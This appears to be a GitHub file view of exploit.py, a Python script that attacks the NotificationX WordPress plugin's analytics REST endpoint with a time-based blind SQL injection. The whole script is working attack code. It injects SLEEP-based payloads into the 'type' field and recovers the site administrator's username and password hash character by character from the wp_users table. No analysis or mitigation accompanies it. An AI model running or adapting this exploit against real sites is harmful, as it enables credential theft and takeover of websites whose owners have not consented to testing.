-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit.py
70 lines (60 loc) · 2.72 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
import requests
import string
from sys import exit
# Sleep time for SQL payloads
delay = 0.3
# URL for the NotificationX Analytics API
url = "http://localhost/wp-json/notificationx/v1/analytics"
admin_username = ""
admin_password_hash = ""
session = requests.Session()
# Find admin username length
username_length = 0
for length in range(1, 41): # Assuming username length is less than 40 characters
resp_length = session.post(url, data={
"nx_id": 1337,
"type": f"clicks`=IF(LENGTH((select user_login from wp_users where id=1))={length},SLEEP({delay}),null)-- -"
})
# Elapsed time > delay if delay happened due to SQLi
if resp_length.elapsed.total_seconds() > delay:
username_length = length
print("Admin username length:", username_length)
break
# Find admin username
for idx_username in range(1, username_length + 1):
# Iterate over all the printable characters + NULL byte
for ascii_val_username in (b"\x00" + string.printable.encode()):
# Send the payload
resp_username = session.post(url, data={
"nx_id": 1337,
"type": f"clicks`=IF(ASCII(SUBSTRING((select user_login from wp_users where id=1),{idx_username},1))={ascii_val_username},SLEEP({delay}),null)-- -"
})
# Elapsed time > delay if delay happened due to SQLi
if resp_username.elapsed.total_seconds() > delay:
admin_username += chr(ascii_val_username)
# Show what we have found so far...
print("Admin username:", admin_username)
break # Move to the next character
else:
# Null byte reached, break the outer loop
break
# Find admin password hash
for idx_password in range(1, 41): # Assuming the password hash length is less than 40 characters
# Iterate over all the printable characters + NULL byte
for ascii_val_password in (b"\x00" + string.printable.encode()):
# Send the payload
resp_password = session.post(url, data={
"nx_id": 1337,
"type": f"clicks`=IF(ASCII(SUBSTRING((select user_pass from wp_users where id=1),{idx_password},1))={ascii_val_password},SLEEP({delay}),null)-- -"
})
# Elapsed time > delay if delay happened due to SQLi
if resp_password.elapsed.total_seconds() > delay:
admin_password_hash += chr(ascii_val_password)
# Show what we have found so far...
print("Admin password hash:", admin_password_hash)
# Exit condition - encountered a null byte
if ascii_val_password == 0:
print("[*] Admin credentials found:")
print("Username:", admin_username)
print("Password hash:", admin_password_hash)
exit(0)